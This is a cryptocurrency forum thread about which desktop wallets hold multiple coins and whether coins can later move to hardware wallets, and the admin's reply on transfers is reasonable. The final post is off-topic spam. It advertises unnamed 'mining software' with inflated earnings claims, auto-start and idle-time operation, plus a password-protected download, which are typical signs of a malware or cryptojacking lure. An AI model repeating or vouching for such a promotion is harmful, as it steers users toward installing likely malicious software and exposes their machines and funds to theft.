Multicurrency desktop wallets

Old Man Crypto

Expert chainblocker
I use a hardware wallet for my coins. But some of them aren’t storable on the Ledger. What are the best desktop wallets for storing multiple different coins? Do any of them handle monero or Dash? Do I have to keep it only on a computer never online to really be safe? That’s very hard to do for most people. With software wallets do you have the private keys or are they like exchanges?

Is there a book or good article on this somewhere?

Alexandros

Contributor
That is a very good question. I was wondering something along those lines but mostly whether or not it is possible to transfer coins from a desktop wallet to a hardware wallet once they start accepting more coins.

The CC Forums

Admin
Staff member
That is a very good question. I was wondering something along those lines but mostly whether or not it is possible to transfer coins from a desktop wallet to a hardware wallet once they start accepting more coins.

You can transfer coins from any wallet or exchange to hardware wallets. Your choice of software or desktop wallet shouldn't be based on compatibility with hardware wallets unless you want to import it directly to avoid network transfer fees and times.

Jaxx, Exodus, and paper wallets can be imported into hardware wallets. I don't use anything except paper or hardware.

jodenhik1

Contributor
The best bitcoin mining software in May 2023

This is the best program that helps you mine cryptocurrency and allows you to pay in dollars or bitcoins. This application also works when your PC is idle.

Earning potential: A powerful GPU can generate up to $300-400 per month.
Minimum payouts: At least $100
Payout frequency: Daily/nightly
Supported platforms: Windows

Features:
- You can easily customise this software.
- This cryptocurrency mining software provides a clean graphical interface.
- It automatically starts when you turn on your PC.
- Miner using the CPU and GPU.
- It is available in English, Spanish, Portuguese, and other languages.

You can use the link below to install the application.
Password to the application: Miner